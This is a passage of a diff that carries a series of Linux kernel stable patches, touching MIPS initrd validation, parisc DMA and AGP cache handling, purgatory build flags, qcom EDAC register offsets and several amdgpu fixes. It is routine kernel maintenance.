+ 		cpu_probe_mips(c, cpu);
+ 		break;
+ 	case PRID_COMP_ALCHEMY:
++	case PRID_COMP_NETLOGIC:
+ 		cpu_probe_alchemy(c, cpu);
+ 		break;
+ 	case PRID_COMP_SIBYTE:
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index f1c88f8a1dc51..81dbb4ef52317 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -158,10 +158,6 @@ static unsigned long __init init_initrd(void)
+ 		pr_err("initrd start must be page aligned\n");
+ 		goto disable;
+ 	}
+-	if (initrd_start < PAGE_OFFSET) {
+-		pr_err("initrd start < PAGE_OFFSET\n");
+-		goto disable;
+-	}
+ 
+ 	/*
+ 	 * Sanitize initrd addresses. For example firmware
+@@ -174,6 +170,11 @@ static unsigned long __init init_initrd(void)
+ 	initrd_end = (unsigned long)__va(end);
+ 	initrd_start = (unsigned long)__va(__pa(initrd_start));
+ 
++	if (initrd_start < PAGE_OFFSET) {
++		pr_err("initrd start < PAGE_OFFSET\n");
++		goto disable;
++	}
++
+ 	ROOT_DEV = Root_RAM0;
+ 	return PFN_UP(end);
+ disable:
+diff --git a/arch/mips/loongson2ef/Platform b/arch/mips/loongson2ef/Platform
+index eebabf9df6ac0..c6f7a4b959978 100644
+--- a/arch/mips/loongson2ef/Platform
++++ b/arch/mips/loongson2ef/Platform
+@@ -25,7 +25,7 @@ cflags-$(CONFIG_CPU_LOONGSON2F) += -march=loongson2f
+ # binutils does not merge support for the flag then we can revisit & remove
+ # this later - for now it ensures vendor toolchains don't cause problems.
+ #
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
++cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ # Enable the workarounds for Loongson2f
+ ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
+diff --git a/arch/nios2/boot/dts/10m50_devboard.dts b/arch/nios2/boot/dts/10m50_devboard.dts
+index 56339bef3247d..0e7e5b0dd685c 100644
+--- a/arch/nios2/boot/dts/10m50_devboard.dts
++++ b/arch/nios2/boot/dts/10m50_devboard.dts
+@@ -97,7 +97,7 @@
+ 			rx-fifo-depth = <8192>;
+ 			tx-fifo-depth = <8192>;
+ 			address-bits = <48>;
+-			max-frame-size = <1518>;
++			max-frame-size = <1500>;
+ 			local-mac-address = [00 00 00 00 00 00];
+ 			altr,has-supplementary-unicast;
+ 			altr,enable-sup-addr = <1>;
+diff --git a/arch/nios2/boot/dts/3c120_devboard.dts b/arch/nios2/boot/dts/3c120_devboard.dts
+index d10fb81686c7e..3ee3169063797 100644
+--- a/arch/nios2/boot/dts/3c120_devboard.dts
++++ b/arch/nios2/boot/dts/3c120_devboard.dts
+@@ -106,7 +106,7 @@
+ 				interrupt-names = "rx_irq", "tx_irq";
+ 				rx-fifo-depth = <8192>;
+ 				tx-fifo-depth = <8192>;
+-				max-frame-size = <1518>;
++				max-frame-size = <1500>;
+ 				local-mac-address = [ 00 00 00 00 00 00 ];
+ 				phy-mode = "rgmii-id";
+ 				phy-handle = <&phy0>;
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 0f0d4a496fef0..75677b526b2bb 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -90,10 +90,6 @@
+ #include <asm/asmregs.h>
+ #include <asm/psw.h>
+ 
+-	sp	=	30
+-	gp	=	27
+-	ipsw	=	22
+-
+ 	/*
+ 	 * We provide two versions of each macro to convert from physical
+ 	 * to virtual and vice versa. The "_r1" versions take one argument
+diff --git a/arch/parisc/kernel/pci-dma.c b/arch/parisc/kernel/pci-dma.c
+index ba87f791323be..71ed5391f29d6 100644
+--- a/arch/parisc/kernel/pci-dma.c
++++ b/arch/parisc/kernel/pci-dma.c
+@@ -446,11 +446,27 @@ void arch_dma_free(struct device *dev, size_t size, void *vaddr,
+ void arch_sync_dma_for_device(phys_addr_t paddr, size_t size,
+ 		enum dma_data_direction dir)
+ {
++	/*
++	 * fdc: The data cache line is written back to memory, if and only if
++	 * it is dirty, and then invalidated from the data cache.
++	 */
+ 	flush_kernel_dcache_range((unsigned long)phys_to_virt(paddr), size);
+ }
+ 
+ void arch_sync_dma_for_cpu(phys_addr_t paddr, size_t size,
+ 		enum dma_data_direction dir)
+ {
+-	flush_kernel_dcache_range((unsigned long)phys_to_virt(paddr), size);
++	unsigned long addr = (unsigned long) phys_to_virt(paddr);
++
++	switch (dir) {
++	case DMA_TO_DEVICE:
++	case DMA_BIDIRECTIONAL:
++		flush_kernel_dcache_range(addr, size);
++		return;
++	case DMA_FROM_DEVICE:
++		purge_kernel_dcache_range_asm(addr, addr + size);
++		return;
++	default:
++		BUG();
++	}
+ }
+diff --git a/arch/powerpc/purgatory/Makefile b/arch/powerpc/purgatory/Makefile
+index a81d155b89aed..df50b155c7672 100644
+--- a/arch/powerpc/purgatory/Makefile
++++ b/arch/powerpc/purgatory/Makefile
+@@ -4,6 +4,11 @@ KASAN_SANITIZE := n
+ 
+ targets += trampoline_$(BITS).o purgatory.ro
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ LDFLAGS_purgatory.ro := -e purgatory_start -r --no-undefined
+ 
+ $(obj)/purgatory.ro: $(obj)/trampoline_$(BITS).o FORCE
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index 659e21862077b..6574c91c99b14 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -25,6 +25,11 @@ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ CFLAGS_string.o := -D__DISABLE_EXPORTS
+ CFLAGS_ctype.o := -D__DISABLE_EXPORTS
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 3a261abb6d158..15b7b403a4bd0 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -50,7 +50,7 @@ KBUILD_CFLAGS += $(call cc-option,-fmacro-prefix-map=$(srctree)/=)
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ KBUILD_CFLAGS += -D__DISABLE_EXPORTS
+ # Disable relocation relaxation in case the link is not PIE.
+-KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mrelax-relocations=no)
++KBUILD_CFLAGS += $(call cc-option,-Wa$(comma)-mrelax-relocations=no)
+ KBUILD_CFLAGS += -include $(srctree)/include/linux/hidden.h
+ 
+ # sev.c indirectly inludes inat-table.h which is generated during
+diff --git a/arch/x86/kernel/head_64.S b/arch/x86/kernel/head_64.S
+index d860d437631b6..998cdb112b725 100644
+--- a/arch/x86/kernel/head_64.S
++++ b/arch/x86/kernel/head_64.S
+@@ -85,6 +85,15 @@ SYM_CODE_START_NOALIGN(startup_64)
+ 	call	startup_64_setup_env
+ 	popq	%rsi
+ 
++	/* Now switch to __KERNEL_CS so IRET works reliably */
++	pushq	$__KERNEL_CS
++	leaq	.Lon_kernel_cs(%rip), %rax
++	pushq	%rax
++	lretq
++
++.Lon_kernel_cs:
++	UNWIND_HINT_EMPTY
++
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+ 	 * Activate SEV/SME memory encryption if supported/enabled. This needs to
+@@ -98,15 +107,6 @@ SYM_CODE_START_NOALIGN(startup_64)
+ 	popq	%rsi
+ #endif
+ 
+-	/* Now switch to __KERNEL_CS so IRET works reliably */
+-	pushq	$__KERNEL_CS
+-	leaq	.Lon_kernel_cs(%rip), %rax
+-	pushq	%rax
+-	lretq
+-
+-.Lon_kernel_cs:
+-	UNWIND_HINT_EMPTY
+-
+ 	/* Sanitize CPU configuration */
+ 	call verify_cpu
+ 
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 82fec66d46d29..42abd6af11984 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -14,6 +14,11 @@ $(obj)/sha256.o: $(srctree)/lib/crypto/sha256.c FORCE
+ 
+ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/drivers/block/xen-blkfront.c b/drivers/block/xen-blkfront.c
+index 35b9bcad9db90..5ddf393aa390f 100644
+--- a/drivers/block/xen-blkfront.c
++++ b/drivers/block/xen-blkfront.c
+@@ -780,7 +780,8 @@ static int blkif_queue_rw_req(struct request *req, struct blkfront_ring_info *ri
+ 		ring_req->u.rw.handle = info->handle;
+ 		ring_req->operation = rq_data_dir(req) ?
+ 			BLKIF_OP_WRITE : BLKIF_OP_READ;
+-		if (req_op(req) == REQ_OP_FLUSH || req->cmd_flags & REQ_FUA) {
++		if (req_op(req) == REQ_OP_FLUSH ||
++		    (req_op(req) == REQ_OP_WRITE && (req->cmd_flags & REQ_FUA))) {
+ 			/*
+ 			 * Ideally we can do an unordered flush-to-disk.
+ 			 * In case the backend onlysupports barriers, use that.
+diff --git a/drivers/char/agp/parisc-agp.c b/drivers/char/agp/parisc-agp.c
+index d68d05d5d3838..514f9f287a781 100644
+--- a/drivers/char/agp/parisc-agp.c
++++ b/drivers/char/agp/parisc-agp.c
+@@ -90,6 +90,9 @@ parisc_agp_tlbflush(struct agp_memory *mem)
+ {
+ 	struct _parisc_agp_info *info = &parisc_agp_info;
+ 
++	/* force fdc ops to be visible to IOMMU */
++	asm_io_sync();
++
+ 	writeq(info->gart_base | ilog2(info->gart_size), info->ioc_regs+IOC_PCOM);
+ 	readq(info->ioc_regs+IOC_PCOM);	/* flush */
+ }
+@@ -158,6 +161,7 @@ parisc_agp_insert_memory(struct agp_memory *mem, off_t pg_start, int type)
+ 			info->gatt[j] =
+ 				parisc_agp_mask_memory(agp_bridge,
+ 					paddr, type);
++			asm_io_fdc(&info->gatt[j]);
+ 		}
+ 	}
+ 
+@@ -191,7 +195,16 @@ static unsigned long
+ parisc_agp_mask_memory(struct agp_bridge_data *bridge, dma_addr_t addr,
+ 		       int type)
+ {
+-	return SBA_PDIR_VALID_BIT | addr;
++	unsigned ci;			/* coherent index */
++	dma_addr_t pa;
++
++	pa = addr & IOVP_MASK;
++	asm("lci 0(%1), %0" : "=r" (ci) : "r" (phys_to_virt(pa)));
++
++	pa |= (ci >> PAGE_SHIFT) & 0xff;/* move CI (8 bits) into lowest byte */
++	pa |= SBA_PDIR_VALID_BIT;	/* set "valid" bit */
++
++	return cpu_to_le64(pa);
+ }
+ 
+ static void
+diff --git a/drivers/clk/pxa/clk-pxa3xx.c b/drivers/clk/pxa/clk-pxa3xx.c
+index 42958a5426625..621e298f101a0 100644
+--- a/drivers/clk/pxa/clk-pxa3xx.c
++++ b/drivers/clk/pxa/clk-pxa3xx.c
+@@ -164,7 +164,7 @@ void pxa3xx_clk_update_accr(u32 disable, u32 enable, u32 xclkcfg, u32 mask)
+ 	accr &= ~disable;
+ 	accr |= enable;
+ 
+-	writel(accr, ACCR);
++	writel(accr, clk_regs + ACCR);
+ 	if (xclkcfg)
+ 		__asm__("mcr p14, 0, %0, c6, c0, 0\n" : : "r"(xclkcfg));
+ 
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index 2c91ceff8a9ca..518092d7eaf73 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -21,30 +21,9 @@
+ #define TRP_SYN_REG_CNT                 6
+ #define DRP_SYN_REG_CNT                 8
+ 
+-#define LLCC_COMMON_STATUS0             0x0003000c
+ #define LLCC_LB_CNT_MASK                GENMASK(31, 28)
+ #define LLCC_LB_CNT_SHIFT               28
+ 
+-/* Single & double bit syndrome register offsets */
+-#define TRP_ECC_SB_ERR_SYN0             0x0002304c
+-#define TRP_ECC_DB_ERR_SYN0             0x00020370
+-#define DRP_ECC_SB_ERR_SYN0             0x0004204c
+-#define DRP_ECC_DB_ERR_SYN0             0x00042070
+-
+-/* Error register offsets */
+-#define TRP_ECC_ERROR_STATUS1           0x00020348
+-#define TRP_ECC_ERROR_STATUS0           0x00020344
+-#define DRP_ECC_ERROR_STATUS1           0x00042048
+-#define DRP_ECC_ERROR_STATUS0           0x00042044
+-
+-/* TRP, DRP interrupt register offsets */
+-#define DRP_INTERRUPT_STATUS            0x00041000
+-#define TRP_INTERRUPT_0_STATUS          0x00020480
+-#define DRP_INTERRUPT_CLEAR             0x00041008
+-#define DRP_ECC_ERROR_CNTR_CLEAR        0x00040004
+-#define TRP_INTERRUPT_0_CLEAR           0x00020484
+-#define TRP_ECC_ERROR_CNTR_CLEAR        0x00020440
+-
+ /* Mask and shift macros */
+ #define ECC_DB_ERR_COUNT_MASK           GENMASK(4, 0)
+ #define ECC_DB_ERR_WAYS_MASK            GENMASK(31, 16)
+@@ -60,15 +39,6 @@
+ #define DRP_TRP_INT_CLEAR               GENMASK(1, 0)
+ #define DRP_TRP_CNT_CLEAR               GENMASK(1, 0)
+ 
+-/* Config registers offsets*/
+-#define DRP_ECC_ERROR_CFG               0x00040000
+-
+-/* Tag RAM, Data RAM interrupt register offsets */
+-#define CMN_INTERRUPT_0_ENABLE          0x0003001c
+-#define CMN_INTERRUPT_2_ENABLE          0x0003003c
+-#define TRP_INTERRUPT_0_ENABLE          0x00020488
+-#define DRP_INTERRUPT_ENABLE            0x0004100c
+-
+ #define SB_ERROR_THRESHOLD              0x1
+ #define SB_ERROR_THRESHOLD_SHIFT        24
+ #define SB_DB_TRP_INTERRUPT_ENABLE      0x3
+@@ -88,9 +58,6 @@ enum {
+ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	[LLCC_DRAM_CE] = {
+ 		.name = "DRAM Single-bit",
+-		.synd_reg = DRP_ECC_SB_ERR_SYN0,
+-		.count_status_reg = DRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = DRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = DRP_SYN_REG_CNT,
+ 		.count_mask = ECC_SB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_SB_ERR_WAYS_MASK,
+@@ -98,9 +65,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_DRAM_UE] = {
+ 		.name = "DRAM Double-bit",
+-		.synd_reg = DRP_ECC_DB_ERR_SYN0,
+-		.count_status_reg = DRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = DRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = DRP_SYN_REG_CNT,
+ 		.count_mask = ECC_DB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_DB_ERR_WAYS_MASK,
+@@ -108,9 +72,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_TRAM_CE] = {
+ 		.name = "TRAM Single-bit",
+-		.synd_reg = TRP_ECC_SB_ERR_SYN0,
+-		.count_status_reg = TRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = TRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = TRP_SYN_REG_CNT,
+ 		.count_mask = ECC_SB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_SB_ERR_WAYS_MASK,
+@@ -118,9 +79,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_TRAM_UE] = {
+ 		.name = "TRAM Double-bit",
+-		.synd_reg = TRP_ECC_DB_ERR_SYN0,
+-		.count_status_reg = TRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = TRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = TRP_SYN_REG_CNT,
+ 		.count_mask = ECC_DB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_DB_ERR_WAYS_MASK,
+@@ -128,7 +86,7 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ };
+ 
+-static int qcom_llcc_core_setup(struct regmap *llcc_bcast_regmap)
++static int qcom_llcc_core_setup(struct llcc_drv_data *drv, struct regmap *llcc_bcast_regmap)
+ {
+ 	u32 sb_err_threshold;
+ 	int ret;
+@@ -137,31 +95,31 @@ static int qcom_llcc_core_setup(struct regmap *llcc_bcast_regmap)
+ 	 * Configure interrupt enable registers such that Tag, Data RAM related
+ 	 * interrupts are propagated to interrupt controller for servicing
+ 	 */
+-	ret = regmap_update_bits(llcc_bcast_regmap, CMN_INTERRUPT_2_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->cmn_interrupt_2_enable,
+ 				 TRP0_INTERRUPT_ENABLE,
+ 				 TRP0_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_update_bits(llcc_bcast_regmap, TRP_INTERRUPT_0_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->trp_interrupt_0_enable,
+ 				 SB_DB_TRP_INTERRUPT_ENABLE,
+ 				 SB_DB_TRP_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+ 	sb_err_threshold = (SB_ERROR_THRESHOLD << SB_ERROR_THRESHOLD_SHIFT);
+-	ret = regmap_write(llcc_bcast_regmap, DRP_ECC_ERROR_CFG,
++	ret = regmap_write(llcc_bcast_regmap, drv->edac_reg_offset->drp_ecc_error_cfg,
+ 			   sb_err_threshold);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_update_bits(llcc_bcast_regmap, CMN_INTERRUPT_2_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->cmn_interrupt_2_enable,
+ 				 DRP0_INTERRUPT_ENABLE,
+ 				 DRP0_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_write(llcc_bcast_regmap, DRP_INTERRUPT_ENABLE,
++	ret = regmap_write(llcc_bcast_regmap, drv->edac_reg_offset->drp_interrupt_enable,
+ 			   SB_DB_DRP_INTERRUPT_ENABLE);
+ 	return ret;
+ }
+@@ -175,24 +133,28 @@ qcom_llcc_clear_error_status(int err_type, struct llcc_drv_data *drv)
+ 	switch (err_type) {
+ 	case LLCC_DRAM_CE:
+ 	case LLCC_DRAM_UE:
+-		ret = regmap_write(drv->bcast_regmap, DRP_INTERRUPT_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->drp_interrupt_clear,
+ 				   DRP_TRP_INT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = regmap_write(drv->bcast_regmap, DRP_ECC_ERROR_CNTR_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->drp_ecc_error_cntr_clear,
+ 				   DRP_TRP_CNT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 		break;
+ 	case LLCC_TRAM_CE:
+ 	case LLCC_TRAM_UE:
+-		ret = regmap_write(drv->bcast_regmap, TRP_INTERRUPT_0_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->trp_interrupt_0_clear,
+ 				   DRP_TRP_INT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = regmap_write(drv->bcast_regmap, TRP_ECC_ERROR_CNTR_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->trp_ecc_error_cntr_clear,
+ 				   DRP_TRP_CNT_CLEAR);
+ 		if (ret)
+ 			return ret;
+@@ -205,17 +167,55 @@ qcom_llcc_clear_error_status(int err_type, struct llcc_drv_data *drv)
+ 	return ret;
+ }
+ 
++struct qcom_llcc_syn_regs {
++	u32 synd_reg;
++	u32 count_status_reg;
++	u32 ways_status_reg;
++};
++
++static void get_reg_offsets(struct llcc_drv_data *drv, int err_type,
++			    struct qcom_llcc_syn_regs *syn_regs)
++{
++	const struct llcc_edac_reg_offset *edac_reg_offset = drv->edac_reg_offset;
++
++	switch (err_type) {
++	case LLCC_DRAM_CE:
++		syn_regs->synd_reg = edac_reg_offset->drp_ecc_sb_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->drp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->drp_ecc_error_status0;
++		break;
++	case LLCC_DRAM_UE:
++		syn_regs->synd_reg = edac_reg_offset->drp_ecc_db_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->drp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->drp_ecc_error_status0;
++		break;
++	case LLCC_TRAM_CE:
++		syn_regs->synd_reg = edac_reg_offset->trp_ecc_sb_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->trp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->trp_ecc_error_status0;
++		break;
++	case LLCC_TRAM_UE:
++		syn_regs->synd_reg = edac_reg_offset->trp_ecc_db_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->trp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->trp_ecc_error_status0;
++		break;
++	}
++}
++
+ /* Dump Syndrome registers data for Tag RAM, Data RAM bit errors*/
+ static int
+ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ {
+ 	struct llcc_edac_reg_data reg_data = edac_reg_data[err_type];
++	struct qcom_llcc_syn_regs regs = { };
+ 	int err_cnt, err_ways, ret, i;
+ 	u32 synd_reg, synd_val;
+ 
++	get_reg_offsets(drv, err_type, &regs);
++
+ 	for (i = 0; i < reg_data.reg_cnt; i++) {
+-		synd_reg = reg_data.synd_reg + (i * 4);
+-		ret = regmap_read(drv->regmap, drv->offsets[bank] + synd_reg,
++		synd_reg = regs.synd_reg + (i * 4);
++		ret = regmap_read(drv->regmaps[bank], synd_reg,
+ 				  &synd_val);
+ 		if (ret)
+ 			goto clear;
+@@ -224,8 +224,7 @@ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ 			    reg_data.name, i, synd_val);
+ 	}
+ 
+-	ret = regmap_read(drv->regmap,
+-			  drv->offsets[bank] + reg_data.count_status_reg,
++	ret = regmap_read(drv->regmaps[bank], regs.count_status_reg,
+ 			  &err_cnt);
+ 	if (ret)
+ 		goto clear;
+@@ -235,8 +234,7 @@ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ 	edac_printk(KERN_CRIT, EDAC_LLCC, "%s: Error count: 0x%4x\n",
+ 		    reg_data.name, err_cnt);
+ 
+-	ret = regmap_read(drv->regmap,
+-			  drv->offsets[bank] + reg_data.ways_status_reg,
++	ret = regmap_read(drv->regmaps[bank], regs.ways_status_reg,
+ 			  &err_ways);
+ 	if (ret)
+ 		goto clear;
+@@ -297,8 +295,7 @@ static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 
+ 	/* Iterate over the banks and look for Tag RAM or Data RAM errors */
+ 	for (i = 0; i < drv->num_banks; i++) {
+-		ret = regmap_read(drv->regmap,
+-				  drv->offsets[i] + DRP_INTERRUPT_STATUS,
++		ret = regmap_read(drv->regmaps[i], drv->edac_reg_offset->drp_interrupt_status,
+ 				  &drp_error);
+ 
+ 		if (!ret && (drp_error & SB_ECC_ERROR)) {
+@@ -313,8 +310,7 @@ static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 		if (!ret)
+ 			irq_rc = IRQ_HANDLED;
+ 
+-		ret = regmap_read(drv->regmap,
+-				  drv->offsets[i] + TRP_INTERRUPT_0_STATUS,
++		ret = regmap_read(drv->regmaps[i], drv->edac_reg_offset->trp_interrupt_0_status,
+ 				  &trp_error);
+ 
+ 		if (!ret && (trp_error & SB_ECC_ERROR)) {
+@@ -346,7 +342,7 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	int ecc_irq;
+ 	int rc;
+ 
+-	rc = qcom_llcc_core_setup(llcc_driv_data->bcast_regmap);
++	rc = qcom_llcc_core_setup(llcc_driv_data, llcc_driv_data->bcast_regmap);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index 1a06b8d724f39..dd6f9ae6fbe9f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -1214,7 +1214,6 @@ amdgpu_display_user_framebuffer_create(struct drm_device *dev,
+ 
+ const struct drm_mode_config_funcs amdgpu_mode_funcs = {
+ 	.fb_create = amdgpu_display_user_framebuffer_create,
+-	.output_poll_changed = drm_fb_helper_output_poll_changed,
+ };
+ 
+ static const struct drm_prop_enum_list amdgpu_underscan_enum_list[] =
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 88a9ece7f4647..49a023f59b2fc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -1605,6 +1605,7 @@ static const u16 amdgpu_unsupported_pciidlist[] = {
+ 	0x5874,
+ 	0x5940,
+ 	0x5941,
++	0x5b70,
+ 	0x5b72,
+ 	0x5b73,
+ 	0x5b74,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 3b8825a3e2336..a3cd816f98a14 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -3550,6 +3550,9 @@ static ssize_t amdgpu_psp_vbflash_read(struct file *filp, struct kobject *kobj,
+ 	void *fw_pri_cpu_addr;
+ 	int ret;
+ 
++	if (adev->psp.vbflash_image_size == 0)
++		return -EINVAL;
++
+ 	dev_info(adev->dev, "VBIOS flash to PSP started");
+ 
+ 	ret = amdgpu_bo_create_kernel(adev, adev->psp.vbflash_image_size,
+@@ -3601,13 +3604,13 @@ static ssize_t amdgpu_psp_vbflash_status(struct device *dev,
+ }
+ 
+ static const struct bin_attribute psp_vbflash_bin_attr = {
+-	.attr = {.name = "psp_vbflash", .mode = 0664},
++	.attr = {.name = "psp_vbflash", .mode = 0660},
+ 	.size = 0,
+ 	.write = amdgpu_psp_vbflash_write,
+ 	.read = amdgpu_psp_vbflash_read,
+ };
+ 
+-static DEVICE_ATTR(psp_vbflash_status, 0444, amdgpu_psp_vbflash_status, NULL);
++static DEVICE_ATTR(psp_vbflash_status, 0440, amdgpu_psp_vbflash_status, NULL);
+ 
+ int amdgpu_psp_sysfs_init(struct amdgpu_device *adev)
+ {
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index 2127aab74a68f..84a36b50ddd87 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -6969,8 +6969,10 @@ static int gfx_v10_0_kiq_resume(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	r = amdgpu_bo_kmap(ring->mqd_obj, (void **)&ring->mqd_ptr);
+-	if (unlikely(r != 0))
++	if (unlikely(r != 0)) {
++		amdgpu_bo_unreserve(ring->mqd_obj);
+ 		return r;
++	}
+ 
+ 	gfx_v10_0_kiq_init_queue(ring);
+ 	amdgpu_bo_kunmap(ring->mqd_obj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 1f3fdf6cb903e..fe371022e5104 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3650,8 +3650,10 @@ static int gfx_v9_0_kiq_resume(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	r = amdgpu_bo_kmap(ring->mqd_obj, (void **)&ring->mqd_ptr);
+-	if (unlikely(r != 0))
++	if (unlikely(r != 0)) {
++		amdgpu_bo_unreserve(ring->mqd_obj);
+ 		return r;
++	}
+ 
+ 	gfx_v9_0_kiq_init_queue(ring);
+ 	amdgpu_bo_kunmap(ring->mqd_obj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c b/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
+index dcc49b01bd59d..300bb926dcba4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
